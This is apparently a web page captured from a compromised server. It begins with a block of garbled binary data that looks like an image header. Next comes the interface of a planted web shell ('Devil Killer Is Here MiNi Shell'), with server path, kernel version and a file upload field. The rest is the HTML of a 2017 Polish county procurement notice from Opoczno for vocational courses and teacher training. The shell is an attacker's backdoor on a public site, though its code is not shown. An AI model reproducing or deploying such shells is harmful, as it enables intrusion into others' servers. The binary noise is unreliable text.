JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170216/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170216/26352-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.pocznopowiat.pl' target='_blank'>http://www.bip.pocznopowiat.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 26352 - 2017
              z dnia 2017-02-16 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Opoczno: Zakup usług przeprowadzenia kursów, szkoleń, warsztatów
dla uczniów/ uczennic /nauczycieli szkół ponadgimnazjalnych
dla których organem prowadzącym jest Powiat Opoczyński zakwalifikowanych do projektów unijnych
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Projekt współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014  2020</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiat Opoczyński reprezentowany przez Zarząd Powiatu Opoczyńskiego, krajowy numer identyfikacyjny
              59064843900000, ul.
              ul. Kwiatowa 
              ,
              26300  
              Opoczno, woj.
              łódzkie, państwo
              Polska, tel.
              447 361 500, e-mail
              zamowienia_publiczne@opocznopowiat.pl, faks
              447 361 500.
              <br />
              Adres strony internetowej (URL): www.opocznopowiat.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.opocznopoiat.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />www.bip.pocznopowiat.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty należy składać  osobiście lub za pośrednictwem posłańca w biurze podawczym w Starostwie Powiatowym, ul. Kwiatowa 1a, 26-300 Opoczno lub za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012r.  Prawo Pocztowe /Dz. U. POZ. 1529 oraz z 2015 r. poz.1830/.<br />
                Adres:
                <br />26-300 Opoczno ul. Kwiatowa 1a </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Zakup usług przeprowadzenia kursów, szkoleń, warsztatów
dla uczniów/ uczennic /nauczycieli szkół ponadgimnazjalnych
dla których organem prowadzącym jest Powiat Opoczyński zakwalifikowanych do projektów unijnych
<br /><b>Numer referencyjny: </b>OZ.272.05.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1. Przedmiot zamówienia obejmuje:
1.1.Zakup  usługi przeprowadzenia kursów dla uczniów/uczennic Zasadniczej Szkoły Zawodowej w Zespole Szkół Zawodowych w  Żarnowie oraz Zasadniczej Szkoły Zawodowej w Zespole Szkół Ponadgimnazjalnych w Drzewicy i zakwalifikowanych do projektu Szkoły Zawodowe z terenu powiatu opoczyńskiego drogą do sukcesu na regionalnym rynku pracywspółfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014-2020, celem doskonalenia umiejętności i kompetencji zawodowych uczniów/uczennic w tym:
CZĘŚĆ I. KURS ORGANIZACJI PRZYJĘĆ OKOLICZNOŚCIOWYCH
CZĘŚĆ II. KURS SPAWACZA METODĄ MAG 135
CZĘŚĆ III. SZKOLENIE WSTĘPNE / INSTRUKTAŻ OGÓLNY W ZAKRESIE BEZPIECZEŃSTWA I HIGIENY PRACY 
Szczegółowy opis przedmiotu zamówienia znajduje się załącznikach:
Część I  załącznik nr 1/1 do SIWZ
Część II  załącznik nr 1/2 do SIWZ
Część III  załącznik nr 1/3 do SIWZ

1.2.Zakup usługi przeprowadzenia kursów dla uczniów/uczennic Technikum w Zespole Szkół Ponadgimnazjalnych w Drzewicy zakwalifikowanych do projektu Doskonalenie umiejętności i kompetencji praktycznych uczniów Technikum i poszerzenie kompetencji nauczycieli Zespołu szkół Ponadgimnazjalnych w Drzewicy  kolejny krok do sukcesu zawodowego absolwentów szkoływspółfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014-2020, celem doskonalenia umiejętności i kompetencji zawodowych uczniów/uczennic w tym:
CZĘŚĆ IV. KURS MAGAZYNIER Z OBSŁUGĄ KAS FISKALNYCH I FAKTUROWANIEM KOMPUTEROWYM
CZĘŚĆ V. KURS KIEROWCA WÓZKA JEZDNIOWEGO Z NAPĘDEM SILNIKOWYM I WYMIANĄ BUTLI Z GAZEM
CZĘŚĆ VI. SZKOLENIE WSTĘPNE / INSTRUKTAŻ OGÓLNY W ZAKRESIE BEZPIECZEŃSTWA I HIGIENY PRACY
Szczegółowy opis przedmiotu zamówienia znajduje się załącznikach: 
Część IV  załącznik nr 1/4 do SIWZ
Część V  załącznik nr 1/5 do SIWZ
Część VI  załącznik nr 1/6 do SIWZ

1.3. Zakup usług szkoleniowych dla 4 nauczycieli kształcenia zawodowego oraz instruktorów praktycznej nauki zawodu uczących w Zespole Szkół Technicznych w Mroczkowie Gościnnym w zakresie mechaniki pojazdów samochodowych zakwalifikowanych do projektu pt.  Centrum Kształcenia Zawodowego   i Ustawicznego szansą na sprawne połączenie wysoko wyspecjalizowanej kadry dydaktycznej z oczekiwaniami otoczenia społeczno-gospodarczego wobec absolwentów kierunków branży mechanicznej i budowlanej współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014-2020 celem doskonalenia umiejętności i kompetencji zawodowych nauczycieli w tym:
CZĘŚĆ VII. SZKOLENIE W ZAKRESIE ELEKTRONIKI I ELEKTROTECHNIKI Z ZAKRESU MECHANIKI POJAZDOWEJ
CZĘŚĆ VIII. SZKOLENIE W ZAKRESIE DIAGNOSTYKI SILNIKÓW SPALINOWYCH
Szczegółowy opis przedmiotu zamówienia znajduje się załącznikach:
Część VII  załącznik nr 1/7 do SIWZ
Część VIII  załącznik nr 1/8 do SIWZ

1.4. Zakup usługi edukacyjnej polegającej na przeprowadzeniu kursów, warsztatów dla uczniów/uczennic Technikum w Zespole Szkół Ponadgimnazjalnych nr 1 im. Stanisława Staszica w Opocznie zakwalifikowanych do udziału w projekcie pn.: Rozwój kompetencji zawodowych uczniów Technikum kształcących się w zawodach: technik logistyk, technik analityk, technik elektryk, technik ekonomista, technik handlowiec, technik informatyk w Zespole Szkół Ponadgimnazjalnych nr 1 w Opocznie we współpracy z przedsiębiorcami współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014- 2020 celem nabycia kompetencji zawodowych zwiększających ich zdolność do zatrudnienia  na rynku pracy w tym:
CZĘŚĆ IX. KURS  WÓZKÓW JEZDNIOWYCH Z UPRAWNIENIAMI DO WYMIANY BUTLI Z GAZEM;
CZĘŚĆ  X. ZAJĘCIA WARSZTATOWE Z ANALITYKI LABORATORYJNEJ  DLA UCZNIÓW/UCZENNIC KSZTAŁCĄCYCH SIĘ W ZAWODZIE TECHNIK ANALITYK
CZĘŚĆ XI. USŁUGA PRZEPROWADZENIA KURSÓW LINUX: 3115,3116,3117  SZKOLENIE ON-LINE

Szczegółowy opis przedmiotu zamówienia znajduje się załącznikach:
Część IX  załącznik nr 1/9 do SIWZ
Część X  załącznik nr 1/10 do SIWZ
Część XI  załącznik nr 1/11 do SIWZ

1.5. Zakup usługi przeprowadzenia kursów lub warsztatów dla uczniów/ uczennic Technikum w Zespole Szkół Ponadgimnazjalnych nr 1 im. Stanisława Staszica  w Opocznie zakwalifikowanych do udziału w projekcie pn. Rozwój kompetencji zawodowych uczniów Technikum kształcących się w zawodach: technik obsługi turystycznej, technik mechanik, technik mechatronik, technik technologii żywności, technik hotelarstwa w Zespole Szkół Ponadgimnazjalnych nr 1 w Opocznie we współpracy z przedsiębiorcami współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014 -2020 celem nabycia kompetencji zawodowych zwiększających ich zdolność do zatrudnienia na rynku pracy w tym:
CZĘŚĆ XII. KURS BARMANA
CZĘŚĆ XIII.  KURS BARISTY
CZĘŚĆ XIV.  KURS CARVINGU
CZĘŚĆ XV.  WARSZTATY Z OBRABIAREK STEROWANYCH NUMERYCZNIE
CZĘŚĆ XVI.  WARSZTATY Z TECHNOLOGII ŻYWNOŚCI
Szczegółowy opis przedmiotu zamówienia znajduje się załącznikach:
Część XII  załącznik nr 1/12 do SIWZ
Część XIII  załącznik nr 1/13 do SIWZ
Część XIV  załącznik nr 1/14 do SIWZ
Część XV  załącznik nr 1/15 do SIWZ
Część XVI  załącznik nr 1/16 do SIWZ
<br /><br /><b>II.5) Główny kod CPV: </b>80000000-4<br /><b> Dodatkowe kody CPV:</b>80530000-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/06/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający określa szczegółowe wymagania  co do potwierdzania spełniania tego warunku w opisach przedmiotu zamówienia w ramach poszczególnych części oraz w projektach umów. 
Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Części I,II,III,IV,V,VI
Wykonawca przystępujący do niniejszego postępowania spełni warunek jeśli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje  co najmniej 2 usługi polegające na przeprowadzeniu kursów i szkoleń /odpowiadające tematyce każdej z części/ przez Wykonawcę dla grup minimum 8-10 osób, w tym dla uczniów szkół ponadgimnazjalnych- a zamówienia te zostały wykonane lub są wykonywane należycie.
Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.
Części  VII,VIII,IX
Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.
Części X
Wykonawca przystępujący do niniejszego postępowania spełni warunek jeśli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje  co najmniej 2 usługi polegające naprzeprowadzeniu zajęć warsztatowych z analityki laboratoryjnej obejmujących młodzież ze szkół ponadgimnazjalnych- a zamówienia te zostały wykonane lub są wykonywane należycie.
Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.
Części XI
Wykonawca przystępujący do niniejszego postępowania spełni warunek jeśli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje  co najmniej 2 usługi polegające na przeprowadzeniu autoryzowanych kursów Linuxa obejmujących młodzież ze szkół ponadgimnazjalnych - a zamówienia te zostały wykonane lub są wykonywane należycie.
Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.
Części XII,XIII,XIV
Zamawiający nie określa szczegółowych wymagań co do potwierdzania spełniania tego warunku. Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.
Części XV
Wykonawca przystępujący do niniejszego postępowania spełni warunek jeśli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje  co najmniej 2 usługi polegające przeprowadzeniu zajęć warsztatowych z obrabiarek sterowanych numerycznie obejmujących młodzież ze szkół ponadgimnazjalnych- a zamówienia te zostały wykonane lub są wykonywane należycie.
Ocena spełniania tego warunku zostanie dokonana na podstawie złożonego oświadczenia.
Części XVI
Wykonawca przystępujący do niniejszego postępowania spełni warunek jeśli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje  co najmniej 2 usługi polegające na przeprowadzeniu zajęć warsztatowych z technologii żywności obejmujących młodzież ze szkół ponadgimnazjalnych - a zamówienia te zostały wykonane lub są wykonywane należycie.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
